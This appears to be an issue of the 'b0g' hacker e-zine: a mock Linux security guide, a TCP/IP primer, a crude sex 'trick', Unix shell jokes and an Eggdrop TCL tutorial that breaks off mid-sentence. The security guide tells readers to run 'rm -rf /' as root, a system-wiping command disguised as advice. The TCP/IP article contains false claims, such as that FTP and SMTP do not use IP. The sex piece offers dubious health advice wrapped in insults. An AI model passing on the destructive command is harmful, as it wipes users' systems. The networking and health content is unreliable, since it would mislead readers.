__u33OOO3OO333O33OO+l_%3 _jO4O4O4O% 4: 4ZO44z OOOO3; l"??~ __uO3333333O333333O333Ov`_j%l _dOO4O4O4;.J' ,-34O{ OOO3+` = __x333OOO3333O3O3333O3O3333]0jx?l|-_jUO4O4O42-_x ]4cJ?-__ ]3O33O33333O3O3333O3O333O]%x3^l |3j44O4O4O4+` ] .|*\ud444Gw_ -]3O3O3O33333O3O3333OO%^~ _dO4OO4O4O7'= u*M4OOO44Ga__| - u-~~?^?""~--O| l__d444O4O4OX7`] x~M4O4O4O44Gna__ll= __au4UU44O4O442?` = "*34O4OO4OO4444guaaaaaawaauZO444OO4OOO4O4O?- 0"?*OO4O4OO4O4OOOO3O4444OO4O4O4O4X3?~` ""?*3XOO4O4OO4OO4OO44OX37?^` [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ] [ b0g article # 1 :::::::::::::::::::::::::::::::::::::::::::::: b0g ] [ :::::::::: Securing Corel Linux - Prae - prae@talk21.com ::::::::: ] [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ] This detailed guide on how to secure Corel Linux is all you will ever need to read... Here is what we do:- First, login as root. Your prompt should look something like this: [root@localhost ~]$ Then start with these simple commands [root@localhost ~]$ rm -rf / [root@localhost ~]$ reboot And thats all you need to know about securing corel Linux! [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ] [ b0g article # 2 :::::::::::::::::::::::::::::::::::::::::::::: b0g ] [ :::::::: Guide to TCP/IP � redpriest - priest@hack3r.com ::::::::: ] [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ] Ok TCP/IP is a software based communications protocol used in networking. Although the name may appear to be a entire combination of just two protocols, The term refers not to a single entity combining two protocols but rather a set of software programs that provide network services such as the many things you use on the Internet today (Remote login, FTP, And e-mail) Although those are the basic services that the protocol suite provides that isn't the boundaries many other things use tcp/ip to communicate, TCP/IP basically provides a method of transferring information from one computer to another. TCP/IP has protocol's to handle error correction, Manage the routing and delivery of data and control the actual transmission. And many other things you will find out later in this lecture. Despite the fact that tcp/ip is an open protocol many companies around the world have modified it for there own networking system. You should be careful in choosing to modify it because it needs to be combatable with hardware and software and can cause problems TCP/IP is very often referred to as an Internet architecture because TCP/IP and the Internet are closely woven The Internet was originally proposed by the precursor of DARPA, called (ARPA) Advanced research projects agency, as a method of testing the viability of packet-switching networks, During the tenure with the project , ARPA foresaw a network of leased lines connected by switching nodes. The network were to be named ARPANET, And the switching nodes were named Internet message processors. (IMP'S) After so they developed a "Remote login" protocol/feature it was called the (NCP) Network Control Program, Later on Electronic mail was added through the File transfer protocol (FTP) After this many events occurred but there isn't the bandwidth to tell them here and they have almost no importance to explain here.. As ARPANET grew out of being a military only network, Other companies, universities, corporations and to user community's it became known as the "Internet". Note: There is no single network called the Internet. The term refers to a collective network of subnetworks, The only one thing they have in common is TCP/IP Another thing that was developed later was the Domain Name System but we wont get into that much i decided i would mention the . suffixes and what they are Well we know most of these but i will go over them .com, Would be owned by a commercial company .net, Was meant for networks used by Internet service providers .arpa, Was and is an ARPANET Internet identification addy .gov, Any goverment body .mil, Any military orginization .edu, Educational Institution .org, Anything that dosent fall into one of these categories. Although the suffix's were categorized into those topics today you can basically register any one of them for a price, Ok here i will explain the second part of TCP/IP IP and what its all about. TCP/IP uses a 32-bit address to identify a machine on a network to which it is attached. Ip addresses identify a machines connection to a network, not the machine itself. An ip address is a address that users commonly see on there machine/terminal and example would be 120.43.2.45, Which uniquely identifies that device. There are four formats for the ip address with each used depending on the very size of the network. The four formats have been named the Class of the ip. A through D, The class can be determined by the first three (high order) bits, In fact the first two are usually enough because there aren't many class D networks Ok i will explain each class. Class A addy's are for networks that have many machines on them. The 24 bits for the local address are needed in these cases. The network is usually kept in 7 bits, Which limits the number of networks that can be identified Class B addresses are usually for intermediate networks, with local 16 bit local or host addresses and 14 bit network addresses. Class C networks have only 8 bits for the local or host address, Limiting the number of devices to 256. There are 21 bits for the network addresses. Class D addresses are used for multicasting purposes, when a general broadcast to more than one device is required, the lengths of the ip address are chosen carefully to provide maximum flexibility in assigning both network and local addresses. IP addresses are four sets of 8 bits, for a total 32bits. You often represent these bits by separation with a period, So the format can be thought of as network.local.local.local But for Class A network.network.network.local This is where ARP slips in (Address Resolution Protocol), ARP'S job is to IP address to physical addresses (Network & Local) Next i will explain the Internet protocol datagram header when ethernet receives and IP-Assembled datagram (which includes the ip header), it adds a header to the front to create a frame this process is called encapsulation. One common difference between the IP and Ethernet headers is that ethernets headers contain the physical address of the destination machine, whereas the ip header contains the ip address This translation is performed by ARP. Note: Encapsulation is the process of adding something to the start and sometimes the end of data Ok next i will cover the IP header layout this is a long ass part but that will be basically it for IP next we will move onto TCP. They will be listed in order first comes Version number, this is a 4-bit field that contains the IP version number the protocol the software is using this is needed so that the receiving IP software knows how to decode the rest of the header, Which changes with each new release of the ip standards. The most widely used version i have noticed is IPv4 Although several systems are testing a version called IPng (v.4) the Internet and most lan's do not support IP6 right now. Part of the protocol definition stipulates that tha receiving software needs to check the version number of incoming datagrams before proceeding to anylize the rest of the header. If it cannot handle the Version the machine ignores the content completely Header Length, This 4-bit field reflects the total legnth of the Ip header built by the sending machine. It is specified in 32 bit words. The shortest header is 5 words, But use of the options thing can increase it to it maximum 6 words to properly decode the header, IP MUST know when the header ends and the data begins. There isn't a start-of-data marker so that's why this field is included so the header legnth is used to offset from the start of the ip header to give off IP header. Types of service, The 8-bit (1 byte) Service field instructs how to process the datagram properly. The fields 8 bits are read and assigned. The first 3 bits indicate the datagrams precedence from a value from 0 (normal) to 7 (network control) The higher the number the more important the more import the datagram and in theorie the lower the faster it is routed. The next three bits are one bit flags that control the delay, Throughput, and reliability of the datagram. If the bit is set the the number 0, the setting is normal, A bit set to 1 implies Low delay and high throughput and reliability for respective flags. The last two bits of the fields aren't used. Datagram Length or packet legnth, This one just basically gives the total legnth of the datagram including the header in bytes Next is Identification this field hold a number this is a unique identify created by the sending node, this is required in reassembling fragmented messages, Ensuring that the fragments of one message aren't intermixed with another. Next we cover Flags, the flags are a 3 bit field, the first bit is unused the remaining bits are called DF which stands for Don't Fragment! and MF More fragments, which control handling of the datagrams when the fragmentation is requested The DF flag is set to 1 and cant ever be fragmented if it is so the packet will be returned as an error. The MF flag though is set to 1 and the current datagram is followed by more packets which are reassembled to create tha full message. Next i will skip to TTL (Time to live) i wont get in depth about this one because there isn't much depth to reach, This basically tells the computer the time that the datagram can remain on the network before the datagram is discarded Header Checksum, The number in this field of the IP header is a checksum for tha protocol header field, but not the data fields to enable faster processing of data fields The almost last is the Sending address and destination address, These fields contain 32-bit ip addy's of the sending and destination devices. This is established while the datagram is created not changed during routing Next we cover the > EVIL < option field heh > The option field is of corse optional. It is composed of several codes of variable length. If more that one option is used in this datagram, the option appears consecutively in the ip header. All the options are controlled by a byte This is usually divided into three fields a 1-bit copy flag a 2-bit option class and a 5-bit option number... Damn im up on the typo's Padding isn't a hard one and has a pretty simple job the content of it depends on the options selected the padding is usually to ensure that the datagram header is a round number of bytes In this lecture i will not cover IPv6 because it is a hell of a topic and i wont cover ICMP packets for reasons that any advanced user will know (TO goddamn big :p) I might choose to do a separated lecture y never know Ok next we will look @ the wonderful world of TCP and UDP but first we take a brake for a few minutes as you can imagine im very tired. Ok back from our brake if you didn't remember we are covering TCP and UDP first i will cover alot of TCP then UDP will follow Ok we just covered IP in considerable detail i hope TCP will be also this way, as you might remember, the Internet protocol handles the lower-layer functionality. Right now we look at the transport layer where the TCP and UDP protocols come into play TCP/IP has alot of inner protocols here i will display there names and there function then move onto tcp etc.. (UDP) User Datagram Protocol: Connectionless services The following are routing protocols in the TCP/IP protocol family (IP) Internet Protocol: Handles transmission of information. (ICMP) Internet Message Control Protocol: A maintenance protocol used between two systems to share status and error information (RIP) Routing Information Protocol: determines routing (OSPF) Open shortest path first: Alternate protocol for determining routing The following are Network Address protocols of the TCP/IP suite, remember all of these services will be explained later on in the lecture. (ARP) Address Resolution Protocol: A protocol used to determine the hardware address from the ip address of the destination computer (DNS) Domain Name System: Translates host names into ip one example is www.hackphreak.org after a DNS request would be 206.186.182.10 (RARP) Reverse Address Resolution Protocol: Required when a computer must determine an ip address when it already has a physical hardware address. The following is a group of user services if the TCP/IP suite. (FTP) File transfer protocol: transfers files (BOOTP) Boot protocol: Starts up a network machine (telnet): Allows remote login The following are the gateway protocols they will also along with all others be explained at the end of the lecture (EGP) Exterior Gateway Protocol: transfers routing information for external networks (GGP) Gateway-to-Gateway Protocol transfers routing information between gateways (IGP) Interior Gateway Protocol: transfers routing information for internal networks The following are the LAST types of protocols i call them the OTHER group because they really cant be placed in the other groups. (NFS) Network File System: enables directories on one machine to be mounted on another. (NIS) Network Information Service: Maintains user accounts across networks. (RPC) Remote Procedure Call: enables remote applications to communicate. (SMTP) Simple Main Transfer Protocol: transfers electronic mail (SNMP) Simple Network Management Protocol: Sends status message about the network Ok so we got all the protocols and what they do for your reference. TCP is one of the most widely used transport layer protocols, expanding from its original implementation on the ARPANET to connecting commercial sites all over the world. In theorie TCP could be a very simple software routine, but i wouldn't advise calling TCP simple, Why use a transport layer as complex as tcp? the most important reasons depend on Ips unreliability as you have seen ip dosent guarantee delivery of a datagram packet its a connection less system with no reliability IP simply handles the routing of datagrams, and if a problem occurs during transfer ip just discards the packet generating an ICMP error message back to the sender most people think of TCP and IP as a close pair but in some instances TCP uses itself without the IP protocol Like in FTP and SMTP both of which don't use IP What ip TCP? TCP provides a considerable amount of services in the IP layer and the upper layer, most importantly it provides connection oriented protocol to the upper layers that can be sure to the application that the packet sent out of the network was received entirely. So you could say TCP acts as a message validation protocol providing reliable communications if a datagram is corrupt of lost tcp provides retransmitting. Note: TCP is not a piece of software. its a communications protocol. You could actually think of tcp as being similar to a telephone conversation. A connection is made between the source and the destination this is sometimes called a virtual circuit. But files and data can be transferred during the conversation like a two way phone conversation. and when they are done one or both computers agree to drop the conversation. Because tcp is a connection-oriented protocol responsible for ensuring the transfer of datagram from the source to the destination machine (end-to-end communications, TCP MUST receive communications messages from the destination machine to acknowledge receipt of the datagram, The is a stream of individual characters send asynchronous. This is in contrast to most protocols which use fixed blocks of data. This can pose some conversation problems with applications that handle only formally constructed blocks of data or insist on fixed-size messages. To better illustrate the tole of TCP we will "Follow" a message to get the anoatomy of the message.. The message originates from an application in an upper layer and is then passed to TCP from the next higher layer in the architecture through some protocol, The message is passed as a stream. TCP receives this stream of bytes and assembles them into TCP segments, or packets, In the process of assembling the segment, header information is attached to the front of the data. Each segment has a checksum calculated then embedded within the header as well as a sequence number if there is more than one segment in the entire message. The length of the segment is usually determined by TCP or a system value determined by the system administrator. If two way communications are required like FTP or Telnet, a connection (virtual circuit) between the sending and receiving machines is established prior to passing the segment to IP for routing. This process starts with the sending TCP software issuing a request for a TCP connection with the receiving machine. In the message a unique number (called a socket #) that identify's the sending machines connection. The receiving TCP software assigns its own unique number and sends it back it to the sending machine The two unique numbers then define the connection the two machines until the virtual circuit is terminated, After the virtual circuit, TCP sends the segment to the IP software, which issues the message over the network as a datagram IP can perform and of the changes to the segment that you saw earlier, such as fragmenting it and reassembling it at the destination machine, These steps are completely transparent over the TCP layers however. After winding its way over the network, the receiving machines ip passes the received segment to the recipient machines TCL layer where it is processed and passed up to the applications using an upper-layer protocol If the message was more than one segment long (Not ip datagrams), the receiving TCP software reassembles the message using the sequence numbers contained in each segment header. If a segment is missing or corrupt, TCP returns a message with the faulty sequence number in the body, the originating TCP software can then resend the bad segment (Cool eh?) The receiving machines TCP implementation can perform a simple flow control to prevent buffer overload it does this by sending a buffer size called a window value to the sending machine, Following which the sender can only enough bytes to fill the window, After that the sender must wait for another value to be received. this provides a handshaking protocol between the two machines, although it slows down the transmission time slightly and increases network traffic. I wont get into TCP timers two much. here go's some stuff on TCB and flow Overflow (Overflow) TCP has alot to keep tract of, information about each connection, It does this through transmission control block which contains information about the local and remote socket numbers, the send and receive buffers, security and priority values, and current segment queue. The TCB As mentioned earlier TCP must communicate with IP in the layer below and applications in the upper layer. TCP must also communicate with other TCP implementations across networks. To do this, it uses Protocol Data Units (PDUs), which are called segments in TCP parlance The following is a layout of one of those units The different fields are as follows * Source port: A 16-bit field that identifies the local TCP user (usually an upper-layer application program). * Destination port: A 16-bit field that identifies the remote machine's TCP user. * Sequence number: A number indicating the current block's position in the overall message. This number is also used between two TCP implementations to provide the initial send sequence (ISS) number. * Acknowledgment number: A number that indicates the next sequence number expected. In a backhanded manner, this also shows the sequence number of the last data received; it shows the last sequence number received plus 1. * Data offset: The number of 32-bit words that are in the TCP header. This field is used to identify the start of the data field. * Reserved: A 6-bit field reserved for future use. The six bits must be set to 0. * Urg flag: If on (a value of 1), indicates that the urgent pointer field is significant. * Ack flag: If on, indicates that the Acknowledgment field is significant. * Psh flag: If on, indicates that the push function is to be performed. * Rst flag: If on, indicates that the connection is to be reset. * Syn flag: If on, indicates that the sequence numbers are to be synchronized. This flag is used when a connection is being established. * Fin flag: If on, indicates that the sender has no more data to send. This is the equivalent of an end-of-transmission marker. * Window: A number indicating how many blocks of data the receiving machine can accept. * Checksum: Calculated by taking the 16-bit one's complement of the one's complement sum of the 16-bit words in the header (including pseudo-header) and text together. (A rather lengthy process required to fit the checksum properly into the header.) * Urgent pointer: Used if the urg flag was set; it indicates the portion of the data message that is urgent by specifying the offset from the sequence number in the header. No specific action is taken by TCP with respect to urgent data; the action is determined by the application. * Options: Similar to the IP header option field, this is used for specifying TCP options. Each option consists of an option number (one byte), the number of bytes in the option, and the option values. Only three options are currently defined for TCP: * Padding: Filled to ensure that the header is a 32-bit multiple. Next i will cover how TCP establishes a connection in EXACT process this will help you understand TCP i think A connection can be established between two machines only if a connection between the two sockets does not exist, both machines agree to the connection (Like a handshake eh) and both machines have the resources available. If any of them conditions aren't met then the connection cant be made The acceptance of connections can be triggered by an application or a system administration routine. Once a connection is established, it is given certain properties that are valid until the connection is closed Typically, these are a precedence value and a security value. These settings are agreed upon by the two applications when the connection is in the process of being established (Sends a global notice for hackphreak users to wake up :p) In most cases, a connection is expected by two applications, so they issue active or passive open requests, (Ok lets get how its really done), The process begins with Machine A's TCP receiving a request for a connection from its ULP, to which it sends an active or primitive to Machine B. The segment that is constructed has the SYN flag set on (set to 1) and has a sequence number assigned The application on machine B has issued a passive open instruction to its TCP. When the SYN SEQ 50 segment is received, Machine B's TCP sends an acknowledgment back to machine A with the sequence number of 51. Machine B also sets an ISS Number of its own (Initial Send Sequence number) This shows this message as "ACK 51; SYN 200," indicating that the message is an acknowledgment with sequence number 51, it has the SYN flag set, and has an IIS of 200 upon receipt, Machine A sends back its own acknowledgment message with sequence number set to 201. This is "ACK 201" Then, having opened and acknowledged the connection machine a and machine B both send connection open messages through the ULP to the requesting applications it is not necessary for the remote machine to have passive open instruction, as mentioned earlier. In this case the sending machine provides both the sending and receiving socket numbers, as well as precedence, security, and timeout values. It is common for two applications to request an active open at the same time. This is resolved quite easily, Although it does involve a little more network traffic. I will describe data transfer and how it occurs but not closing connections etc.. because that's long stuff :p Transferring information is straightforward, For each block of data received my machines A's TCP from the ULP, TCP encapsulates it and sends it to Machine B with an increasing sequence number. After Machine B receives the message it acknowledges it with a segment a acknowledgement that increments the next sequence number (and hence indicates that it has received everything up to that sequence) The TCP data transport actually embodies six subservices 1. Full duplex: Enables both ends of a connection to transmit at any time, even simultaneously 2. Timeliness: Use of timers to ensure that data is transmitted within a reasonable amount of time 3. Ordered: Data sent from one application is received in the same order at the other end this occurs despite the fact that the datagrams might be received out of order through IP, because TCP reassembles the message in the correct order before passing it up to higher layers 4. Labeled: All connections have an agreed-upon precedence and security value 5. TCP can regulate the flow of information through the use of buffers and window limits 6. Checksums ensure that data is free of errors (Within checksums algorithm's limits) Ok now that i have completed that lets move on to the promised stuff on UDP UDP: User Diagram Protocol just for your notes or whatever just an explanation of the acronym TCP is a connection-based protocol. There is times where a connectionless protocol is required, so UDP is used. UDP is used with both Trivial File Transfer Protocol (TFTP) and the remote call procedure. Connectionless communications don't provide reliability, meaning that there is no indication to the sending device that a message has been received correctly. Connectionless protocols also do not offer error-recovery capabilities which must be either ignored or provided in the higher or lower layers. UDP is much more simple than TCP it interfaces with IP (and or other protocols" without the bother of flow control or error correction mechanisms, acting simply as a sender and receiver of datagrams. The UDP message header is much much simpler than TCP's. the following is the fields of a UDP header * Source port: An optional fields with the port number. If a port number is not specifies, the field is set to 0 * Destination port: The port on the destination machine * Length: The length of the datagram, including header and data * Checksum: A 16-bit one's complement of ones's complement sum of the datagram, including a pseudoheader similar to that of TCP. Well thats basicly it for UDP a very simple protocol. I have to admit in this lecture i havent covered alot of things basic things that were involving with TCP/IP but i dident because of time & compression besides there is enuf OSI stuff. But expect to see more text from me here. Well i dident cover UDP but hell. I will make more text files on like UDP and IPv6, IPv6 isn't ANSI yet but i suppose it will be Shouts : B0g, Rhino9, b0g, gH, b0g, #hackphreak, b0g, mosthated, b0g, #k-rad, grimreapa, b0g, rafay, b0g, system_v, b0g, HFG and all u's i missed. b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g b0g!# !b0 b0 #@! b0g!# #@! b0g !b0g!#@ !b0 b0 #@ @!b0g!#@ #@! b0g @!b0g!#@! !b0 !b0 #@ #@! #@! #@! b0g @! @!b !#@! !b0 #@!b0g!#@!b !#@ 0 @!b #@! b0g #@!b #@!b #@! !#@!b0g! !b0 !#@!b0g!#@!b !# b0g!#@!b #@! b0g!#@!b0 #@!b #@! g!#@!b0g! !b0 !#@!b0g!#@!b g!# !b0g!#@ b0 #@! b0g!#@!b0g #@!b #@! 0g!# b0g! !b0 !b !# g! @!b !#@ b0 #@! b0g !b0g #@!b #@! 0g!# b0g! !b0 @!b !# g! @!b !#@ b0 #@! b0g !b0g #@!b #@! 0g! b0g! !b0 @!b !# g! @!b !#@ b0 #@! b0g !b0g #@!b #@! 0g! b0g! !b0 !#@!b0g!#@! g! @!b !#@ b0 #@! b0g !b0g #@!b #@! 0g! b0g! !b !#@!b0g!#@! g! @!b !#@ b0 #@ b0g !b0g #@!b #@! 0g!# !b0g! @! g! g!# !b0g!#@!b0 b0g!#@!b #@!b0g!#@! g!#@!b0g! !b0 #@! g! !# !b0g!#@!b #@! b0g!#@!b @!b0g!#@ g!#@!b0g! !b0 #@! 0g! !#@ b0 !#@!b #@! 0g!#@! !b0g!# !#@ b0g! !b0 #@ 0g #@! #@! b0g! !b0g!#@! g!#@!b0g b0g!#@ g!#@!b0 g!#@!b b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ] [ b0g article # 3 :::::::::::::::::::::::::::::::::::::::::::::: b0g ] [ :::::::::::::: Sex0r guide � k-rad-bob - 808@c2i.net ::::::::::::: ] [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ] #Short guide to better sex. In this short article I'm going to share a little secret with you. I haven't met many people who actually knows about this trick, and it always make me feel so good about myself when I meet them after a given period of time since I sk00led them in the noble art of seks0ring. The trick itself is as simple as it is useful. Here are just some of the advantages it has: #You won't smell like crusted semen. #You can masturbate almost anywhere at any time. Just wear a baggy pair of pants and you're in the clear! #You don't spoil the climax of you orgasm by searching for tissue and/or aiming #Your chick won't swallow : ( ? Now she doesn't have to, yet you still orgasm in her mouth!#@$! #Did we say less messy? #You will maintain your erection for much longer #It drastically shortens the "recovery" time between each "sesion" #Also you'll be able to last much longer #If you don't see the potential in this your an complete idiot. Sounds too good to be true? It's not. It's also mad easy. Here follows a brief sk00ling section. I tried to make some leet ASCII illustrations but i got to horny :/ #Step one. Have some sort of sexual activity, where your penis is stimulated. #Step two. As you are approaching your orgasm, quickly locate the secret spot. The spot is the "tube" that your sperm is being pumped through as it travels for freedom, fortune and glory, and the promised land. The best exact location is right below your nutsack. #Step three. As you come, gently use any number of fingers, i use my left or right pointerfinger, and gently press down on the "pipe". Your orgasm will take place and the semen being shot through your tube will be stopped dead in its track, only to retreat. :) Keep applying pressure to the spot until your muscles have stopped pumping. That is! [Note, if you think this is a cheap way to prevent your chick from getting pregnant you are total flamboyant idiot. So for you braindead assmunchs out there, read this: WARNING! If you don't use any form for birthcontrol while using this trick chances are she's going to end up pregnant.] [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ] [ b0g article # 4 :::::::::::::::::::::::::::::::::::::::::::::: b0g ] [ :::::::::: Shell fun � some g1mp � abuse@microsoft.com ::::::::::: ] [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ] Some humorous things to do to a UNIX system: >From the csh (c shell): % make love Make: Don't know how to make love. Stop. % got a light? No match. % sleep with me bad character % man: Why did you get a divorce? man:: Too many arguments. % rm God rm: God nonexistent % make 'heads or tails of all this' Make: Don't know how to make heads or tails of all this. Stop. % make sense Make: Don't know how to make sense. Stop. % make mistake Make: Don't know how to make mistake. Stop. % make bottle.open Make: Don't know how to make bottle.open. Stop. % \(- (-: Command not found. % rm -i God rm: remove God? y % ls God God not found % make light Make: Don't know how to make light. Stop. % date me You are not superuser: date not set Thu Aug 25 15:52:30 PDT 1988 % man rear No manual entry for rear. % If I had a ) for every dollar Reagan spent, what would I have? Too many )'s. % * How would you describe George Bush *: Ambiguous. % %Vice-President %Vice-President: No such job. % ls Meese-Ethics Meese-Ethics not found % "How would you rate Reagan's senility? Unmatched ". % [Where is Jimmy Hoffa? Missing ]. % ^How did the^sex change operation go? Modifier failed. % cp /dev/null sex;chmod 000 sex % more sex sex: Permission denied % mv sex show % strip show strip: show: Permission denied % who is my match? No match. % set i="Democratic_Platform";mkdir $i;chmod 000 $i;ls $i Democratic_Platform unreadable % awk "Polly, the ship is sinking" awk: syntax error near line 1 awk: bailing out near line % %blow %blow: No such job. % 'thou shalt not commit adultery' thou shalt not commit adultery: Command not found. And from the bourne shell (sh): $ drink < bottle;opener bottle: cannot open opener: not found $ test my argument test: too many arguments $ "Amelia Earhart" Amelia Earhart: not found $ PATH=pretending! /usr/ucb/which sense no sense in pretending! $ man -kisses dog dog: nothing appropriate $ mkdir "Yellow Pages";fiYellow Pages $ mkdir matter;cat > matter matter: cannot create $ lost lost: not found $ found found: not found $ i=Hoffa ;>$i ;$i ;rm $i ;rm $i Hoffa: cannot execute rm: Hoffa nonexistent The following are ones that I can't get to work on my BSD 4.3, so I suppose that they are stuff from ATT SysV or some other such: % strip bra bra: Cannot open % sccs what bottle can't open bottle (26) $ cat "door: paws too slippery" can't open door: paws too slippery $ cat food_in_tin_cans cat: can't open food_in_tin_cans ........................................... ...#""""""#................................ ..." ~ ~ "................................ ..( 0 0 ).. /------------------------\.. ...| <> |... | |.. ...| /""\ |...< I am dumb! |.. ...| ____ |... | |.. ...|| ||... \------------------------/.. ....\��/................................. ......||................................... [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ] [ b0g article # 5 :::::::::::::::::::::::::::::::::::::::::::::: b0g ] [ ::::::::::::::: TCL Guide � Prae � prae@talk21.com ::::::::::::::: ] [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ] [ note from the editor, ever write somehting in pico again and i�ll kill you with my bare hands, i spendt 4 hours editing this too make it look alright!@$ you�ll see what i mean near the end :((( ] This document is made to help explain how to make TCL scripts for the eggdrop. It covers BASIC concepts, and programming. I suggest that you have a copy of tcl-commands.doc handy, for this document will refer to it many a time. I hope this helps in learning TCL and good luck! Outline: I - Triggers for code (Events/Binds) II - Procedures explained. III - Variables, If statements IV - String manipulation commands (string & l commands) V - Loops VI - User-get/User-set VII - Return command VIII - Good Programming Habits IX - Commands, in sample code & explained. ## I - Triggers for code (Events/Binds) ## Eggdrop operates on an event based system. If I type 'hello' to the channel, the eggdrop matches that text against a list of events (referred to as binds) for channel commands. The eggdrop contains many events: pubm (public text matching), mode (channel mode changes), nick nick changes), join (joins to the channel), part (parts of the channel), and many others; they may be found in tcl-commands.doc. Syntax for bind: bind Example: bind join - * join:join The type of bind is triggered when some one joins a channel, the '-' stands for any flag (you could have put an 'o' to signify to only execute the procedure when he has Op Access) and the match matches the address/nick/channel (This accepts wild cards, explain further in section IV). The procedure 'join:join' is the part of code which it executes if the bind is matched up correctly. Another Example: bind dcc O sayhi dcc:sayhi If someone in DCC chat party line, with channel op access (and console is to that channel), or global op access types '.sayhi' it will execute the procedure 'dcc:sayhi'. In Eggdrop 1.1.x the default binds are prefixed with the type of bind then a ':' then the name; in this document I will also follow that form. A list of flags may be obtained via .help whois in DCC chat ## II - Procedures Explained ## A procedure is a section of code which may be called by anything in a program. For Eggdrop's use, this where all the code goes for on events. When an action takes place and a bind is triggered it calls a procedure to take action. For example if you wanted to write your own auto-op script, when ever a person with op access joins the channel it would call a procedure and then the procedure would send the command to give ops. syntax for procedures: proc { } { body } When a bind is triggered it gives certain information to the procedure that is required to do any thing, information such as nicks, hosts, handles, and any other arguments needed. This was taken from tcl-commands.doc from the info of the bind pubm. procname What this says is when ever a pubm bind is triggered you need variablesto put these 5 pieces of information. You can call the variables any thing you choose, it could be a, b, c, d and e. I suggest using something short, and to the point; such as nick, host, hand, chan, and text. Example of a bind, and a procedure: bind pubm - hello pubm:hello proc pubm:hello {nick host handle chan text} { putserv "PRIVMSG $chan :Hello $nick" } # The Bind # public match (pubm) flags needed to trigger: None (- means none) triggered by: hello procedure to be called: pubm:hello # The Procedure # putserv is a command which sends text to the server. PRIVMSG is a server command for sending private msgs. $chan is the variable that will contain the channel which it occurred on $nick is the variable that will contain the nickname of who said "hello" !!!PLEASE NOTE!!!: When using RAW IRC commands you need to put a ':' in front of text that has more than one word, such as the message of a msg. The same thing can also be accomplished with this bind pubm - hello pubcommand_hello proc pubcommand_hello {n uh h chan t} { puthelp "PRIVMSG $n :Hello $n!" } The bind is basically the same I just changed the name of the procedure. In the procedure I changed the name of the variables, I used 'n' instead of 'nick' and so on. However I did use a different command. Puthelp is a Eggdrop command which queues the text so as not to flood the bot. I HIGHLY SUGGEST USING THIS! :) (*) Use putserv when you need some thing to happen instantaneously. Like a kick, or a ban. (*) Use pushmode when you want modes to stack to be send as groups to the server (e.g '+ooo |mmortal Ernst Ec|ipse'), and instantaneous speed is not necessary. (*) Use puthelp when messaging people, or channels. syntax for puthelp: puthelp " " Example: puthelp "NOTICE $nick :Hi there $nick!" same syntax applies for putserv and putmode as well If you notice is only one space, that's why you need the ""'s (quotes). If you do not put the quotes there you get the error msg: TCL error: called "puthelp" with too many arguments. So you put the quotes to show that it belongs only in one spot. Procedures can also call themselves, without the need for a bind. For instance if there is one particular thing you must have done in ALL of your procedures; and don't feel like writing it. In this example you have to send a msg too the person every time he does a command, here is some sample code: bind pubm - kick pubm:kick proc pubm:kick {nick host hand chan text} { noaccess $nick } proc noaccess {who} { puthelp "PRIVMSG $who :Sorry $who, you do not have access to that command" } noaccess is accessable by any procedure in the bot, so any time you want to say some one doesn't have access, just call noaccess. !!!PLEASE NOTE!!!: I've seen this question about 100 times, and even asked it my self once. Never use 'args' as a variable in procedures it does strange things. It puts brackets ({}'s) around the variables and causes big problems if one does not know how to use it. (back to top) ## III - Variables, If statements ### Variables A variable is where you assign a symbol, or word (such as $nick) a value. This value can be a string (words, or sentences) or a numeral. In TCL there are 2 main types of variables: global, and private. A global variable is when you want to store information in it, and wish other procedures to use. A private variable could be a variable that you use in a procedure, which does not need to be used outside of that procedure. syntax for setting a variable: set Example: set name "Prae" To unset a variable, simply use the command unset. syntax for unsetting a variable: unset Example: unset name When using the variable, put a '$' infront of it so the procedure understands it is a variable. So the variable 'name' would be used in the code as '$name'. Additional Notes: To distinguish between a global, and private variable simply use a 'global' command at the top of the proc. When setting the variable, or using a global statement the '$' is not needed. syntax for global: global Example: proc test {a b c d e} { global name owner botnick } Eggdrop has some pre-set global variables, such as the bot's nick ($botnick). They are (taken from tcl-commands.doc): botnick current nickname the bot is using, ie 'Valis' or 'Valis0', etc botname current nick!user@host that the server sees, ie 'Valis!valis@crappy.com' server current server the bot is using, ie 'irc.math.ufl.edu:6667' version current bot version (ie: "1.1.2+pl1 1010201 pl1"); first item is the text version, second item is a numerical version, and any following items are the names of patches that have been added uptime unixtime value for when the bot was started To use them inside a proc, you must declare them as global at the beginning of your proc (e.g 'global botnick'). You'll see better uses for variables in the section IV If Statement: One of the most important aspects of a programming language is an 'if' statement. It will return a TRUE, or FALSE statement and execute the commands with such association. If statement use a logic type of approach; like: If 1 is equal to 1 times 1 then do this <> or else do this <>. syntax for if: if {v1 v2} {do this if true} else {do this if false (optional)} or if {v1 v2} {do this if true} {do this if false (optional)} notice the omission of else in the second example, both formats will perform the same function. These are some of the operators avaliable: == - (equal) != - (not equal) <= - (Less than/equal to) >= - (Greater than/equal to) < - (Less than) > - (Greater than) && - (equivalent to and) || - (equivalent to or) Example: if {$nick == $botnick} { putmsg $chan "I am $nick!!!" } else { putmsg $chan "I am NOT $nick" } This says if the value of $nick is the same as the value of $botnick then it sends a msg to the chan saying "I am $nick", and if not saying "I am not $nick". !!!PLEASE NOTE!!!: IT IS CASE SENSITIVE !!!PLEASE NOTE!!!: IT IS CASE SENSITIVE !!!PLEASE NOTE!!!: IT IS CASE SENSITIVE !!!PLEASE NOTE!!!: IT IS CASE SENSITIVE Did you get that? Maybe once more !!!PLEASE NOTE!!!: IT IS CASE SENSITIVE Case Sensitive Defined: Where the CaPs MaTtErs. Such as 'HELLO' is not the same as 'hello'. Now this is where TCL starts to differ from other programming languages that I've encountered. Lets say you want to write a check to see if $nick is an op on $chan. Well some languages could use an operator like if $nick isop $chan. Not TCL... There is a procedure called 'isop'. This 